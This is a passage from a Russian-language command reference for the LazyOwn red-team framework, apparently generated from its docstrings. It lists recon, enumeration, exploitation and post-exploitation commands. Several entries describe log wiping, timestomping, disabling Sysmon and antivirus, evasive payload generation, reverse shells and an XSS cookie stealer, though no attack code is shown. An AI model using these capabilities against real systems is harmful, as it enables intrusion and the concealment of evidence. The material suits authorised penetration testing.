Безопасно удалить файлы, перезаписывая их перед удалением.

sleep_configure

Фаза: не категоризировано | Источник: cli/commands/sleep_obfuscation.py

Настроить активную технику обфускации сна.

sleep_info

Фаза: не категоризировано | Источник: cli/commands/sleep_obfuscation.py

Показать подробную информацию о технике обфускации сна.

sleep_list

Фаза: не категоризировано | Источник: cli/commands/sleep_obfuscation.py

Перечислить доступные техники обфускации сна.

socks_config

Фаза: не категоризировано | Источник: cli/commands/socks_proxy.py

Показать или настроить SOCKS5-прокси.

socks_export

Фаза: не категоризировано | Источник: cli/commands/socks_proxy.py

Экспортировать спецификацию SOCKS5-прокси для доставки beacon.

socks_sessions

Фаза: не категоризировано | Источник: cli/commands/socks_proxy.py

Перечислить активные сеансы SOCKS-прокси.

staged_delivery

Фаза: не категоризировано | Источник: cli/commands/payload_arsenal.py

Сгенерировать артефакты поэтапной доставки (HTA, VBA, LNK, ISO, VHD).

state_snapshot

Фаза: не категоризировано | Источник: lazyown.py

Показать единый снимок StateManager (кэши БД + JSON).

status_bar

Фаза: не категоризировано | Источник: cli/commands/orchestration.py

Просмотреть, переключить и обновить строку состояния приглашения.

status_tail

Фаза: не категоризировано | Источник: cli/commands/audit.py

Вывести живой прогресс из последнего файла sessions/scan_*.partial.

sysmon_disable

Фаза: не категоризировано | Источник: cli/commands/opsec_cleanup.py

Сгенерировать команды для отключения Windows Sysmon.

threat_model

Фаза: не категоризировано | Источник: cli/commands/mcp_bridge.py

Построить или проверить модель угроз, полученную из событий сеанса.

timeline

Фаза: без категории | Источник: cli/commands/mcp_bridge.py

Псевдоним timeline_browser сохранён для совместимости с глаголами MCP (lazyown_timeline).

timestomp

Фаза: без категории | Источник: cli/commands/opsec_cleanup.py

Изменяет MACB-временные метки файлов, чтобы обойти судебный анализ временной шкалы.

unseal_credentials

Фаза: без категории | Источник: cli/commands/security.py

Расшифровывает запечатанные значения учётных данных в payload.json для проверки.

vuln_list

Фаза: без категории | Источник: cli/commands/reporting.py

Выводит список обнаруженных уязвимостей из базы данных сессий.

wipe_free

Фаза: без категории | Источник: cli/commands/anti_forensics.py

Очищает свободное дисковое пространство для предотвращения судебного восстановления файлов.

wipe_logs

Фаза: без категории | Источник: cli/commands/anti_forensics.py

Очищает системные журналы на удалённой цели.

wipe_timeline

Фаза: без категории | Источник: cli/commands/anti_forensics.py

Затирает временные метки файлов и историю команд на цели.

Справочник команд LazyOwn

Автоматически сгенерировано readmeneitor.py из исходных docstring и cli/command_index.json.

Содержание


01. Разведка

alterx

Фаза: разведка | Источник: cli/commands/recon_migrated.py

Выполняет команду 'alterx' для перечисления поддоменов по указанному self.params['domain']. Если 'alterx'

apache_users

Фаза: разведка | Источник: cli/commands/recon_migrated.py

Выполняет перечисление пользователей целевой системы с помощью apache-users.

binarycheck

Фаза: разведка | Источник: cli/commands/recon_migrated.py

Выполняет различные проверки выбранного бинарного файла для сбора информации и определения защит.

cve

Фаза: разведка | Источник: cli/commands/recon_migrated.py

Поиск CVE с использованием API CIRCL.

dig

Фаза: разведка | Источник: cli/commands/recon.py

Выполняет команду dig для запроса DNS-информации.

dnschef

Фаза: разведка | Источник: cli/commands/recon_migrated.py

Выполняет инструмент DNSChef для мониторинга DNS-запросов и перехвата ответов.

dnsenum

Фаза: разведка | Источник: cli/commands/recon.py

Выполняет перечисление DNS с помощью dnsenum для определения поддоменов заданного домена.

dnsmap

Фаза: разведка | Источник: cli/commands/recon.py

Выполняет перечисление DNS с помощью dnsmap для обнаружения поддоменов указанного домена.

dnstool_py

Фаза: разведка | Источник: cli/commands/recon_migrated.py

Выполняет инструмент dnstool.py для изменения DNS-записей, интегрированных с Active Directory.

estorides_import

Фаза: разведка | Источник: cli/commands/estorides.py

Импорт сущностей, обнаруженных Estorides, в базу данных и область LazyOwn.

estorides_loop

Фаза: разведка | Источник: cli/commands/estorides.py

Запуск двунаправленного цикла обратной связи Estorides <-> LazyOwn.

estorides_seed

Фаза: разведка | Источник: cli/commands/estorides.py

Передача хостов/доменов LazyOwn в Estorides для пассивного OSINT-обнаружения.

estorides_surface

Фаза: разведка | Источник: cli/commands/estorides.py

Показ комбинированной активной и пассивной поверхности атаки.

finalrecon

Фаза: разведка | Источник: cli/commands/recon.py

Запускает инструмент finalrecon для выполнения сканирования уязвимостей веб-сервера по указанному целевому хосту.

getcap

Фаза: разведка | Источник: cli/commands/recon_migrated.py

Получение и отображение возможностей файлов в системе.

gospider

Фаза: разведка | Источник: cli/commands/recon_migrated.py

Попробуйте gospider для веб-сканирования.

graudit

Фаза: recon | Источник: cli/commands/recon_migrated.py

Выполняет команду graudit для проведения статического анализа кода с указанными параметрами.

httprobe

Фаза: recon | Источник: cli/commands/recon_migrated.py

Выполняет инструмент httprobe для проверки доменов на наличие работающих HTTP и HTTPS серверов.

ipinfo

Фаза: recon | Источник: cli/commands/recon_migrated.py

Получает подробную информацию об IP-адресе с помощью API ARIN.

launchpad

Фаза: recon | Источник: cli/commands/recon_migrated.py

Выполняет поиск пакетов на Launchpad на основе указанного поискового запроса и извлекает кодовые имена из результатов. Дистрибутив извлекается из поискового запроса.

metabigor

Фаза: recon | Источник: cli/commands/recon_migrated.py

Выполняет команды Metabigor для задач OSINT и сканирования с управляемым вводом или предопределёнными аргументами.

openssl_sclient

Фаза: recon | Источник: cli/commands/recon.py

Использует openssl s_client для подключения к указанному хосту и порту, что позволяет тестировать и отлаживать SSL/TLS-соединения.

ping

Фаза: recon | Источник: cli/commands/recon_migrated.py

Выполняет ping для проверки доступности хоста и определения операционной системы на основе значений TTL.

ports

Фаза: recon | Источник: cli/commands/recon_migrated.py

Перечисляет все открытые TCP и UDP порты на локальной системе.

proxy

Фаза: recon | Источник: cli/commands/recon_migrated.py

Запускает небольшой прокси-сервер для изменения HTTP-запросов на лету.

recon

Фаза: recon | Источник: cli/commands/recon_migrated.py

Выполняет разведку по указанному self.params['domain'] с использованием crt.sh (цель должна быть доступна в интернете), pup, httprobe и EyeWitness.

serveralive2

Фаза: recon | Источник: cli/commands/recon_migrated.py

Команда serveralive2: использует Impacket для подключения к удалённому интерфейсу MSRPC и получает привязки сервера.

sherlock

Фаза: recon | Источник: cli/commands/recon_migrated.py

Выполняет инструмент Sherlock для поиска имён пользователей в социальных сетях.

sslscan

Фаза: recon | Источник: cli/commands/recon_migrated.py

Выполняет SSL-сканирование указанного удалённого хоста.

surface

Фаза: recon | Источник: cli/commands/recon_migrated.py

Отображает граф сетевой поверхности в терминале.

tcpdump_capture

Фаза: recon | Источник: cli/commands/recon_migrated.py

Запускает захват пакетов с помощью tcpdump на указанном интерфейсе.

tcpdump_icmp

Фаза: recon | Источник: cli/commands/recon_migrated.py

Запускает tcpdump для захвата ICMP-трафика на указанном интерфейсе.

trace

Фаза: recon | Источник: cli/commands/recon_migrated.py

Прослеживает DNS-информацию для заданного self.params['domain'] с использованием сервиса FreeDNS. (используется IP FreeDNS, а не ваш IP)

trufflehog

Фаза: recon | Источник: cli/commands/recon_migrated.py

Выполняет trufflehog для поиска секретов в указанном URL Git-репозитория.

tshark_analyze

Фаза: recon | Источник: cli/commands/recon_migrated.py

Анализирует файл захвата пакетов с помощью tshark на основе указанного IP-адреса удалённого хоста.

waybackmachine

Фаза: recon | Источник: cli/commands/recon_migrated.py

Извлекает URL-адреса из Wayback Machine для указанного веб-сайта.

whatweb

Фаза: recon | Источник: cli/commands/recon.py

Выполняет сканирование для определения технологий веб-сайта с помощью whatweb.

windapsearchscrapeusers

Фаза: recon | Источник: cli/commands/recon_migrated.py

Извлекает имена пользователей из JSON-вывода, созданного go-windapsearch, и добавляет их

02. Сканирование и перечисление

ad_ldap_enum

Фаза: enum | Источник: cli/commands/scan_migrated.py

Выполняет ad-ldap-enum для перечисления объектов Active Directory (пользователи, группы, компьютеры)

allin

Фаза: enum | Источник: cli/commands/scan_migrated.py

Выполняет инструмент AlliN.py с различными режимами сканирования и параметрами.

amass

Фаза: enum | Источник: cli/commands/scan.py

Выполняет Amass для пассивного перечисления заданного домена.

arjun

Фаза: enum | Источник: cli/commands/scan_migrated.py

Выполняет сканирование Arjun по указанному URL для обнаружения параметров.

arpscan

Фаза: enum | Источник: cli/commands/scan.py

Выполняет ARP-сканирование с помощью arp-scan.

batchnmap

Фаза: enum | Источник: cli/commands/recon.py Запускает внутренний модуль modules/lazynmap.sh для множественных Nmap-сканирований.

bbot

Фаза: enum | Источник: cli/commands/scan.py

Выполняет BBOT-сканирование для проведения различных разведывательных задач.

blazy

Фаза: enum | Источник: cli/commands/scan_migrated.py

Команда blazy: устанавливает и запускает blazy для сканирования веб-приложений на множественные уязвимости.

bloodhound

Фаза: enum | Источник: cli/commands/scan_migrated.py

Выполняет перечисление LDAP с помощью bloodhound-python, используя учетные данные из файла.

breacher

Фаза: enum | Источник: cli/commands/scan_migrated.py

Команда breacher: устанавливает и запускает Breacher для поиска страниц входа администратора и уязвимостей EAR.

certipy

Фаза: enum | Источник: cli/commands/scan_migrated.py

Выполняет инструмент Certipy для взаимодействия со службами сертификации Active Directory.

certipy_ad

Фаза: enum | Источник: cli/commands/scan_migrated.py

Запускает certipy-ad против служб сертификации Active Directory.

changeme

Фаза: enum | Источник: cli/commands/scan_migrated.py

Выполняет сканирование changeme по указанному целевому URL-адресу или хосту.

cme

Фаза: enum | Источник: cli/commands/scan_migrated.py

Выполняет CrackMapExec (CME) для перечисления SMB и попыток аутентификации против цели.

davtest

Фаза: enum | Источник: cli/commands/scan_migrated.py

Проверяет конфигурации WebDAV-сервера с помощью davtest.

dirsearch

Фаза: enum | Источник: cli/commands/scan.py

Запускает инструмент dirsearch для перечисления каталогов и файлов по указанному URL-адресу.

dmitry

Фаза: enum | Источник: cli/commands/scan.py

Эта функция формирует и выполняет команду для инструмента 'dmitry'.

enum4linux

Фаза: enum | Источник: cli/commands/enum.py

Выполняет сбор информации с целевой Linux/Unix-системы с помощью enum4linux.

enum4linux_ng

Фаза: enum | Источник: cli/commands/scan_migrated.py

Выполняет сбор информации с целевой системы с помощью enum4linux-ng.

evil_ssdp

Фаза: enum | Источник: cli/commands/scan_migrated.py

Запускает evil-ssdp с различными параметрами и выбранными пользователем шаблонами.

feroxbuster

Фаза: enum | Источник: cli/commands/scan.py

Команда feroxbuster: устанавливает и запускает Feroxbuster для выполнения принудительного просмотра и перебора каталогов.

finger_user_enum

Фаза: enum | Источник: cli/commands/scan_migrated.py

Выполняет инструмент finger-user-enum для перечисления пользователей на целевом хосте.

fuzz

Фаза: enum | Источник: cli/commands/scan_migrated.py

Выполняет скрипт фаззинга веб-сервера с параметрами, предоставленными пользователем.

getnpusers

Фаза: enum | Источник: cli/commands/enum.py

sudo impacket-GetNPUsers mist.htb/ -no-pass -usersfile sessions/users.txt

gobuster

Фаза: enum | Источник: cli/commands/scan.py

Использует gobuster для перебора каталогов и виртуальных хостов на основе предоставленных параметров. Поддерживает перечисление каталогов и обнаружение виртуальных хостов.

hostdiscover

Фаза: enum | Источник: cli/commands/scan.py

Обнаруживает активные хосты в подсети, выполняя ping-сканирование.

hound

Фаза: enum | Источник: cli/commands/scan_migrated.py

Выполняет инструмент hound: Hound — это простой и легкий инструмент для сбора информации и получения точных GPS-координат.

kerbrute

Фаза: enum | Источник: cli/commands/scan_migrated.py

Выполняет инструмент Kerbrute для перечисления учетных записей пользователей против указанного целевого контроллера домена self.params['domain'].

lazynmap

Фаза: enum | Источник: cli/commands/recon.py

Запускает внутренний модуль modules/lazynmap.sh в целевом режиме.

ldapdomaindump

Фаза: enum | Источник: cli/commands/scan_migrated.py

Выгружает информацию LDAP с помощью ldapdomaindump, используя учетные данные из файла.

ldapsearch

Фаза: enum | Источник: cli/commands/scan_migrated.py

Выполняет поиск LDAP против целевого удаленного хоста (self.params['rhost']) и сохраняет результаты.

lookupsid

Фаза: enum | Источник: cli/commands/scan_migrated.py

Выполняет инструмент Impacket lookupsid для перечисления SID в целевой системе.

lookupsid_py

Фаза: enum | Источник: cli/commands/scan_migrated.py

Выполняет инструмент LookupSID для перечисления SID в целевой системе.

loxs

Фаза: enum | Источник: cli/commands/scan_migrated.py Команда loxs: устанавливает и запускает Loxs для сканирования веб-приложений на множественные уязвимости.

lynis

Фаза: перечисление | Источник: cli/commands/scan_migrated.py

Выполняет аудит Lynis на указанной удалённой системе.

magicrecon

Фаза: перечисление | Источник: cli/commands/scan.py

Команда magicrecon: автоматизирует настройку и использование MagicRecon для выполнения различных видов разведки и сканирования уязвимостей на указанных целях.

mqtt_check_py

Фаза: перечисление | Источник: cli/commands/scan_migrated.py

Выполняет инструмент проверки MQTT для проверки учётных данных на целевой системе с опциональным использованием SSL.

nbtscan

Фаза: перечисление | Источник: cli/commands/recon.py

Выполняет сетевое сканирование с помощью nbtscan для обнаружения NetBIOS-имён и адресов в указанном диапазоне.

net_rpc_addmem

Фаза: перечисление | Источник: cli/commands/scan_migrated.py

Выполняет команду net rpc group addmem для добавления пользователя в указанную группу в Active Directory.

netexec

Фаза: перечисление | Источник: cli/commands/scan_migrated.py

Выполняет netexec с различными параметрами для операций с сетевыми протоколами.

netview

Фаза: перечисление | Источник: cli/commands/scan_migrated.py

Выполняет инструмент Impacket netview для перечисления сетевых ресурсов на указанной цели.

nikto

Фаза: перечисление | Источник: cli/commands/recon.py

Запускает инструмент nikto для выполнения сканирования веб-сервера на уязвимости против указанного целевого хоста.

nmapscript

Фаза: перечисление | Источник: cli/commands/scan.py

Выполняет сканирование Nmap с использованием указанного скрипта и порта.

nuclei

Фаза: перечисление | Источник: cli/commands/scan.py

Выполняет сканирование Nuclei по указанному целевому URL или хосту.

odat

Фаза: перечисление | Источник: cli/commands/scan_migrated.py

Команда odat: запускает модуль sidguesser из ODAT для подбора SID Oracle на целевой базе данных Oracle.

openredirex

Фаза: перечисление | Источник: cli/commands/scan_migrated.py

Команда openredirex: клонирует, устанавливает и запускает OpenRedirex для тестирования уязвимостей открытого перенаправления.

osmedeus

Фаза: перечисление | Источник: cli/commands/scan.py

Выполняет сканирование Osmedeus с управляемым вводом для различных сценариев сканирования.

parsero

Фаза: перечисление | Источник: cli/commands/scan_migrated.py

Выполняет сканирование parsero по указанному целевому URL или хосту.

parth

Фаза: перечисление | Источник: cli/commands/scan_migrated.py

Команда parth: устанавливает и запускает Parth для обнаружения уязвимых URL и параметров.

portdiscover

Фаза: перечисление | Источник: cli/commands/scan.py

Сканирует все порты на указанном хосте для определения открытых портов.

portservicediscover

Фаза: перечисление | Источник: cli/commands/scan.py

Сканирует все порты на указанном хосте для определения открытых портов и связанных с ними служб.

pre2k

Фаза: перечисление | Источник: cli/commands/scan_migrated.py

Выполняет инструмент pre2k для запроса self.params['domain'] на предмет учётных записей компьютеров до Windows 2000 или для передачи списка имен хостов для проверки аутентификации.

pykerbrute

Фаза: перечисление | Источник: cli/commands/scan_migrated.py

Команда pykerbrute: автоматизирует установку и выполнение PyKerbrute для перебора учётных записей Active Directory с использованием предварительной аутентификации Kerberos.

rdp_check_py

Фаза: перечисление | Источник: cli/commands/scan_migrated.py

Выполняет инструмент проверки RDP для проверки учётных данных или аутентификации на основе хеша на целевой системе.

rpcclient

Фаза: перечисление | Источник: cli/commands/enum.py

Выполняет команду rpcclient для взаимодействия с удалённой системой Windows через RPC (удалённый вызов процедур) с использованием анонимных учётных данных.

rpcdump

Фаза: перечисление | Источник: cli/commands/enum.py

Выполняет скрипт rpcdump.py для получения списка RPC-служб с целевого хоста.

rpcmap_py

Фаза: перечисление | Источник: cli/commands/scan_migrated.py

Команда rpcmap_py: выполняет команды rpcmap.py для перечисления интерфейсов MSRPC.

samrdump

Фаза: перечисление | Источник: cli/commands/scan_migrated.py

Запускает impacket-samrdump для выгрузки данных SAM с указанных портов.

sawks

Фаза: перечисление | Источник: cli/commands/scan_migrated.py

Выполняет инструмент Swaks (швейцарский армейский нож для SMTP) для отправки тестовых писем для имитации фишинга.

sessionssh

Фаза: перечисление | Источник: cli/commands/scan_migrated.py

Выполняет команду для вывода списка активных SSH-соединений.

skipfish

Phase: enum | Source: cli/commands/scan.py

Эта функция выполняет инструмент веб-безопасности Skipfish.

smbattack

Phase: enum | Source: cli/commands/scan_migrated.py

Сканирует хосты с открытым SMB-сервисом на порту 445 в указанной целевой сети.

smbclient

Phase: enum | Source: cli/commands/enum.py

Взаимодействует с SMB-ресурсами с помощью команды smbclient для выполнения следующих операций:

smbclient_impacket

Phase: enum | Source: cli/commands/enum.py

Взаимодействует с SMB-ресурсами с помощью команды smbclient для выполнения следующих операций:

smbclient_py

Phase: enum | Source: cli/commands/enum.py

Взаимодействует с SMB-ресурсами с помощью команды smbclient.py для выполнения следующих операций:

smbmap

Phase: enum | Source: cli/commands/enum.py

smbmap -H 10.10.10.3 [OPTIONS]

smtpuserenum

Phase: enum | Source: cli/commands/scan_migrated.py

Перечисляет пользователей SMTP с помощью инструмента smtp-user-enum методом VRFY.

snmpcheck

Phase: enum | Source: cli/commands/scan_migrated.py

Выполняет проверку SNMP на указанном целевом хосте.

snmpwalk

Phase: enum | Source: cli/commands/scan_migrated.py

Выполняет проверку SNMP на указанном целевом хосте.

swaks

Phase: enum | Source: cli/commands/scan_migrated.py

Отправляет электронное письмо с помощью swaks (швейцарский армейский нож для SMTP).

vscan

Phase: enum | Source: cli/commands/scan.py

Выполняет сканирование портов с помощью vscan с заданными параметрами.

wfuzz

Phase: enum | Source: cli/commands/recon.py

Использует wfuzz для выполнения фаззинга на основе предоставленных параметров. Эта функция поддерживает различные опции для фаззинга каталогов и файлов.

windapsearch

Phase: enum | Source: cli/commands/scan_migrated.py

Выполняет инструмент windapsearch для перечисления домена Active Directory через LDAP-запросы.

wpscan

Phase: enum | Source: cli/commands/scan_migrated.py

Команда wpscan: устанавливает и запускает WPScan для сканирования уязвимостей WordPress.

03. Эксплуатация

aclpwn_py

Phase: exploit | Source: cli/commands/exploit_migrated.py

Выполняет инструмент aclpwn.py для поиска и эксплуатации путей ACL для повышения привилегий в среде Active Directory.

adcs_check

Phase: exploit | Source: cli/commands/exploit_migrated.py

Проверяет службы сертификации Active Directory на уязвимости ESC1-ESC8.

addspn_py

Phase: exploit | Source: cli/commands/exploit_migrated.py

Выполняет инструмент addspn.py для управления именами участников-служб (SPN) в учетных записях Active Directory через LDAP.

auto_pwn

Phase: exploit | Source: cli/commands/pwn.py

Запускает полную автономную цепочку эксплуатации против цели.

autoblody

Phase: exploit | Source: cli/commands/exploit_migrated.py

Выполняет инструмент autobloody для автоматизации путей повышения привилегий в Active Directory.

cacti_exploit

Phase: exploit | Source: cli/commands/exploit_migrated.py

Автоматизирует эксплуатацию уязвимости Cacti версии 1.2.26.

chain

Phase: exploit | Source: cli/commands/exploit_migrated.py

Запускает автономную цепочку эксплуатации: разведка -> уязвимость -> эксплуатация -> пост-эксплуатация.

commix

Phase: exploit | Source: cli/commands/exploit.py

Запускает commix для тестирования внедрения команд.

cp

Phase: exploit | Source: cli/commands/exploit_migrated.py

Копирует файл из каталога ExploitDB в каталог sessions.

createcookie

Phase: exploit | Source: cli/commands/exploit_migrated.py

Создает файл cookie.txt в каталоге sessions с указанным значением cookie.

createdll

Phase: exploit | Source: cli/commands/exploit_migrated.py

Создает DLL-файл Windows с помощью MinGW-w64 или DLL Blazor для Linux.

digdug

Phase: exploit | Source: cli/commands/exploit_migrated.py

Выполняет Dig Dug для увеличения размера исполняемого файла, используя предварительно настроенные параметры.

download_exploit

Phase: exploit | Source: cli/commands/exploit.py

Загружает и настраивает эксплойт, опционально раздавая его через HTTP.

downloader

Phase: exploit | Source: cli/commands/exploit_migrated.py

Генерирует команду загрузчика для файлов в каталоге sessions.

eternal

Фаза: эксплойт | Источник: cli/commands/exploit_migrated.py

Автоматизирует процесс эксплуатации EternalBlue (MS17-010) с использованием Metasploit.

excelntdonut

Фаза: эксплойт | Источник: cli/commands/exploit_migrated.py

Генерирует макрос Excel 4.0 (XLM) из предоставленного исходного файла C# с помощью EXCELntDonut.

exploit_chain

Фаза: эксплойт | Источник: cli/commands/pwn.py

Многошаговая цепочка эксплойтов на основе ИИ с запасными стратегиями.

exploit_recommend

Фаза: эксплойт | Источник: cli/commands/exploit_migrated.py

Рекомендация эксплойтов на основе ИИ — сопоставляет обнаруженные сервисы с CVE.

filtering

Фаза: эксплойт | Источник: cli/commands/exploit_migrated.py

Применяет различные техники фильтрации к заданной командной строке, изменяя каждый символ или слово соответствующим образом.

gets4uticket_py

Фаза: эксплойт | Источник: cli/commands/exploit_migrated.py

Выполняет инструмент gets4uticket.py из PKINITtools для запроса сервисного билета S4U2Self с использованием Kerberos.

gettgtpkinit_py

Фаза: эксплойт | Источник: cli/commands/exploit_migrated.py

Выполняет инструмент gettgtpkinit.py из PKINITtools для запроса TGT с использованием Kerberos PKINIT с сертификатом PFX или PEM.

greatSCT

Фаза: эксплойт | Источник: cli/commands/exploit_migrated.py

Выполняет инструмент GreatSCT для генерации полезных нагрузок, обходящих антивирусные решения и списки разрешённых приложений.

img2cookie

Фаза: эксплойт | Источник: cli/commands/exploit.py

Генерирует XSS-полезную нагрузку, которая крадёт cookie через тег изображения.

jwt_tool

Фаза: эксплойт | Источник: cli/commands/exploit_migrated.py

Использует jwt_tool для анализа, изменения или эксплуатации JSON Web Tokens (JWT).

krbrelayx_py

Фаза: эксплойт | Источник: cli/commands/exploit_migrated.py

Выполняет инструмент krbrelayx.py для ретрансляции Kerberos или злоупотребления неограниченной делегацией.

kusa

Фаза: эксплойт | Источник: cli/commands/exploit.py

Запускает генератор полезных нагрузок Kusanagi.

lazypwn

Фаза: эксплойт | Источник: cli/commands/exploit.py

Выполняет автоматизированный скрипт эксплуатации LazyPwn.

lfi

Фаза: эксплойт | Источник: cli/commands/exploit_migrated.py

Эксплуатирует потенциальную уязвимость локального включения файлов (LFI) путём создания

lol

Фаза: эксплойт | Источник: cli/commands/exploit_migrated.py

Эксплуатирует цель путём внедрения вредоносной полезной нагрузки и сбора информации об администраторе.

lolbas_use

Фаза: эксплойт | Источник: cli/commands/pwn.py

Выполнить конкретную технику LOLBAS.

ms08_067_netapi

Фаза: эксплойт | Источник: cli/commands/exploit_migrated.py

SMB CVE-2008-4250. Уязвимость с использованием модуля ms08_067_netapi из Metasploit.

ntpdate

Фаза: эксплойт | Источник: cli/commands/exploit_migrated.py

Синхронизирует системные часы с указанным NTP-сервером.

owneredit

Фаза: эксплойт | Источник: cli/commands/exploit_migrated.py

Выполняет инструмент owneredit из Impacket для управления владельцем объектов Active Directory.

padbuster

Фаза: эксплойт | Источник: cli/commands/exploit_migrated.py

Выполняет команду PadBuster для атак с использованием оракула набивки.

powerserver

Фаза: эксплойт | Источник: cli/commands/exploit_migrated.py

Эта функция генерирует PowerShell-скрипт, который получает обратную оболочку через HTTP в системе Windows.

printerbug_py

Фаза: эксплойт | Источник: cli/commands/exploit_migrated.py

Выполняет инструмент printerbug.py для запуска ошибки SpoolService через RPC backconnect.

psexec

Фаза: эксплойт | Источник: cli/commands/enum.py

Выполняет инструмент PSExec из Impacket для попытки удалённого выполнения на указанной цели.

psexec_py

Фаза: эксплойт | Источник: cli/commands/enum.py

Выполняет инструмент PSExec из Impacket для попытки удалённого выполнения на указанной цели.

py3ttyup

Фаза: эксплойт | Источник: cli/commands/exploit_migrated.py

Копирует команду обратной оболочки Python в буфер обмена.

pyautomate

Фаза: эксплойт | Источник: cli/commands/exploit_migrated.py

Автоматизирует выполнение инструментов pwntomate на XML-конфигурационных файлах.

pyoracle2

Фаза: эксплойт | Источник: cli/commands/exploit_migrated.py

Выполняет инструмент pyOracle2 для проведения атак с использованием оракула набивки.

pywhisker

Фаза: эксплойт | Источник: cli/commands/exploit_migrated.py

Выполняет инструмент pywhisker для проведения атак с использованием теневых учётных данных. Выполняет инструмент pyWhisker для управления атрибутом msDS-KeyCredentialLink целевого пользователя или компьютера.

rejetto_hfs_exec

Фаза: эксплуатация | Источник: cli/commands/exploit_migrated.py

HttpFileServer версии 2.3. Уязвимость с использованием модуля rejetto_hfs_exec из metasploit.

rev

Фаза: эксплуатация | Источник: cli/commands/exploit.py

Копирует однострочный reverse shell в буфер обмена.

seo

Фаза: эксплуатация | Источник: cli/commands/exploit_migrated.py

Выполняет веб-сканирование отпечатков пальцев SEO с помощью lazyseo.py.

sharpshooter

Фаза: эксплуатация | Источник: cli/commands/exploit_migrated.py

Выполняет фреймворк создания полезной нагрузки для получения и выполнения произвольного исходного кода C#.

shellfire

Фаза: эксплуатация | Источник: cli/commands/exploit_migrated.py

Запускает Shellfire с различными параметрами и позволяет генерировать полезные нагрузки.

shellshock

Фаза: эксплуатация | Источник: cli/commands/exploit_migrated.py

Выполняет атаку Shellshock против цели.

sireprat

Фаза: эксплуатация | Источник: cli/commands/exploit_migrated.py

Команда sireprat: автоматизирует настройку и использование SirepRAT для выполнения различных атак на устройство Windows IoT Core.

sqli

Фаза: эксплуатация | Источник: cli/commands/exploit_migrated.py

Запрашивает у пользователя URL, базу данных, таблицу и столбцы, а затем выполняет Python-скрипт.

sqli_mssql_test

Фаза: эксплуатация | Источник: cli/commands/exploit_migrated.py

Запускает обратную оболочку MSSQL, запуская HTTP-сервер для обработки входящих подключений и извлечения данных.

sqlmap

Фаза: эксплуатация | Источник: cli/commands/exploit.py

Запускает SQLMap против целевого URL для тестирования SQL-инъекций.

sqsh

Фаза: эксплуатация | Источник: cli/commands/exploit_migrated.py

Выполняет инструмент Impacket sqsh для управления владением объектами Active Directory.

ss

Фаза: эксплуатация | Источник: cli/commands/recon.py

Ищет все источники эксплойтов и сопоставляет результаты со следующей командой LazyOwn.

sshexploit

Фаза: эксплуатация | Источник: cli/commands/exploit_migrated.py

Эксплуатирует уязвимость OpenSSH CVE-2023-38408 через функцию PKCS#11 в ssh-agent.

stealth_on

Фаза: эксплуатация | Источник: cli/commands/pwn.py

Включает скрытый режим для последующих операций.

template_helper_serializer

Фаза: эксплуатация | Источник: cli/commands/exploit_migrated.py

Обрабатывает создание и сериализацию вспомогательного шаблона.

ticketer

Фаза: эксплуатация | Источник: cli/commands/exploit.py

Запускает Impacket ticketer для создания золотых/серебряных билетов.

unicode_WAFbypass

Фаза: эксплуатация | Источник: cli/commands/exploit_migrated.py

Мы открываем прослушиватель Netcat на порту 443 и пытаемся эксплуатировать десериализацию NodeJS, отправляя

upload_bypass

Фаза: эксплуатация | Источник: cli/commands/exploit_migrated.py

Команда upload_bypass: автоматизирует установку и выполнение Upload_Bypass для проведения тестов обхода загрузки файлов.

utf

Фаза: эксплуатация | Источник: cli/commands/exploit_migrated.py

Кодирует заданную полезную нагрузку в escape-последовательности UTF-16.

winbase64payload

Фаза: эксплуатация | Источник: cli/commands/exploit_migrated.py

Создает полезную нагрузку в кодировке base64 специально для Windows, чтобы выполнить команду PowerShell или скачать файл с использованием self.params['lhost'].

wrapper

Фаза: эксплуатация | Источник: cli/commands/exploit.py

Копирует полезные нагрузки LFI php-wrapper в буфер обмена.

www

Фаза: эксплуатация | Источник: cli/commands/exploit.py

Запускает простой HTTP-сервер на настроенном порту для обслуживания полезных нагрузок.

xss

Фаза: эксплуатация | Источник: cli/commands/exploit_migrated.py

Выполняет процедуру тестирования уязвимости XSS (межсайтовый скриптинг).

xsstrike

Фаза: эксплуатация | Источник: cli/commands/exploit_migrated.py

Команда xsstrike: устанавливает и запускает XSStrike для поиска XSS-уязвимостей.

04. Пост-эксплуатация

add2find

Фаза: пост-эксплуатация | Источник: cli/commands/postexp_migrated.py

Добавляет новую пользовательскую команду в систему 'find', сохраняя в user_commands.json.

adversary

Фаза: пост-эксплуатация | Источник: cli/commands/postexp_migrated.py

Эмулятор противника LazyOwn RedTeam, вы можете настроить своих собственных противников в adversary.json.

adversary_yaml

Фаза: пост-эксплуатация | Источник: cli/commands/postexp_migrated.py Выполнение действий противника из YAML-файлов в lazyadversaries/*.yaml

aes_pe

Фаза: постэксплуатация | Источник: cli/commands/postexp_migrated.py

Шифрование с помощью AES и случайного ключа в PE EXE-файл для использования с загрузчиками.

apt_proxy

Фаза: постэксплуатация | Источник: cli/commands/postexp_migrated.py

Настраивает локальную машину с доступом в интернет для работы в качестве APT-прокси для машины без доступа в интернет.

apt_repo

Фаза: постэксплуатация | Источник: cli/commands/postexp_migrated.py

Создает комплексный локальный APT-репозиторий с улучшенным разрешением зависимостей.

atomic_lazyown

Фаза: постэксплуатация | Источник: cli/commands/postexp.py

Выполнение атомарных тестов red-team через LazyOwn.

bin2shellcode

Фаза: постэксплуатация | Источник: cli/commands/postexp_migrated.py

Преобразует бинарный файл в строку shellcode в формате C или Nim.

convert_remcomsvc_from_file

Фаза: постэксплуатация | Источник: cli/commands/postexp_migrated.py

Преобразует байтовую строку Python REMCOMSVC из remcomsvc.py в формат байтового среза Golang, выводит образец и сохраняет его в sessions/remcomsvc.go. См. lazyaddon GoPEInjection.

cports

Фаза: постэксплуатация | Источник: cli/commands/postexp_migrated.py

Генерирует команду для отображения TCP и UDP портов и копирует её в буфер обмена.

create_synthetic

Фаза: постэксплуатация | Источник: cli/commands/postexp_migrated.py

Создает базовый синтетический playbook из Nmap CSV, когда LLM не срабатывает.

createpayload

Фаза: постэксплуатация | Источник: cli/commands/postexp_migrated.py

Генерирует обфусцированный payload для обхода обнаружения AV с помощью инструмента payloadGenerator. Спасибо smokeme.

d3monizedshell

Фаза: постэксплуатация | Источник: cli/commands/postexp_migrated.py

Выполняет инструмент D3m0n1z3dShell для обеспечения постоянства в Linux.

disableav

Фаза: постэксплуатация | Источник: cli/commands/postexp.py

Создает VBS-скрипт для попытки отключения Windows Defender.

exe2bin

Фаза: постэксплуатация | Источник: cli/commands/postexp_migrated.py

Преобразует файл .exe в бинарный файл.

exe2donutbin

Фаза: постэксплуатация | Источник: cli/commands/postexp_migrated.py

